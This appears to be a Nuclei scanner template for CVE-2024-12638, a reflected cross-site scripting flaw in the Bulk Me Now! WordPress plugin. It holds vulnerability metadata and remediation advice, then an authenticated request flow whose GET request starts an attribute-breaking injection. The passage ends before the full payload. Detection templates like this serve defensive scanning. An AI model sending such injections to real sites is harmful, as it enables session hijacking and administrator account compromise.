id: CVE-2024-12638 info: name: Bulk Me Now! Plugin <= 2.0 - Cross-Site Scripting author: Sourabh-Sahu severity: high description: | Bulk Me Now! WordPress plugin <= 2.0 contains a reflected cross-site scripting caused by lack of sanitization and escaping of a parameter before outputting it in the page, letting attackers execute malicious scripts in the context of high privilege users, exploit requires attacker to craft a malicious URL. impact: | Attackers can execute malicious scripts in the context of high privilege users, potentially leading to session hijacking or account compromise. remediation: | Update to the latest version of the plugin where the vulnerability is fixed or implement input sanitization and output escaping. reference: - https://wpscan.com/vulnerability/a6f5b0fe-00a0-4e30-aec6-87882c035beb/ - https://nvd.nist.gov/vuln/detail/CVE-2024-12638 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L cvss-score: 7.1 cve-id: CVE-2024-12638 cwe-id: CWE-79 epss-score: 0.02218 epss-percentile: 0.84606 cpe: cpe:2.3:a:ombu:bulk_me_now\!:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 vendor: ombu product: bulk_me_now tags: cve,cve2024,bulk-me-now,wordpress,wp,wp-plugin,xss,authenticated flow: http(1) && http(2) http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In matchers: - type: dsl dsl: - contains(header, "wordpress_logged_in") internal: true - raw: - | GET /wp-admin/admin.php?page=bulkmenow-list&status=1">